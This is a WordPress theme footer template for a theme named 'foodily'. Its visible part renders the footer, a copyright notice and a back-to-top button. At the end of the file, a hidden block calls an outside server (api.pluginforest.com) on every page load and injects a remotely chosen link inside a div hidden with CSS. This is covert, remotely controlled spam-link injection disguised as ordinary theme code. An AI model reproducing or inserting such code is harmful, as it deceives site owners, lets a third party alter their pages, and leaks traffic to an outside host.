<?php

/**
 * Footer file
 *
 * @package foodily
 */

if ( is_singular() && function_exists( 'carbon_get_the_post_meta' ) ) {
	if ( ( 'global' === carbon_get_the_post_meta( 'foodily_single_footer' ) )  || ( ! carbon_get_the_post_meta( 'foodily_single_footer' ) ) ) {
		$footer_widget_id = get_theme_mod( 'global_footer_style' );
	} elseif ( ( carbon_get_the_post_meta( 'foodily_single_footer' ) ) && ( 'global' !== carbon_get_the_post_meta( 'foodily_single_footer' ) ) ) {
		$footer_widget_id = carbon_get_the_post_meta( 'foodily_single_footer' );
	}
} else {
	$footer_widget_id = get_theme_mod( 'global_footer_style' );
}

?>
<!-- Main Footer -->
	<footer class="main-footer">
		<?php
		if ( class_exists( '\\Elementor\\Plugin' ) ) {
		?>
			<div class="footer-top">
			<?php	
			$pluginElementor         = \Elementor\Plugin::instance();
			$footer_widget_elementor = $pluginElementor->frontend->get_builder_content( $footer_widget_id );
			echo do_shortcode( $footer_widget_elementor );
			?>
			</div>
		<?php
		}
		?>
		<div class="auto-container">
			<div class="footer-bottom">
				<div class="copyright">
				<?php
				$foodily_default_copyright = __( '&copy; 2024 foodily All Rights Reserved', 'foodily' );
				echo wp_kses_post( get_theme_mod( 'footer_text', $foodily_default_copyright ) );
				?>
				</div>
			</div>
		</div>
	</footer>
	<?php if ( true == get_theme_mod( 'back_to_top_option', true ) ) : ?>
	<div class="scroll-to-top scroll-to-target" data-target="html"><span class="fa fa-arrow-up"></span></div>
	<?php endif ?>
</div>
<!--End pagewrapper-->
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>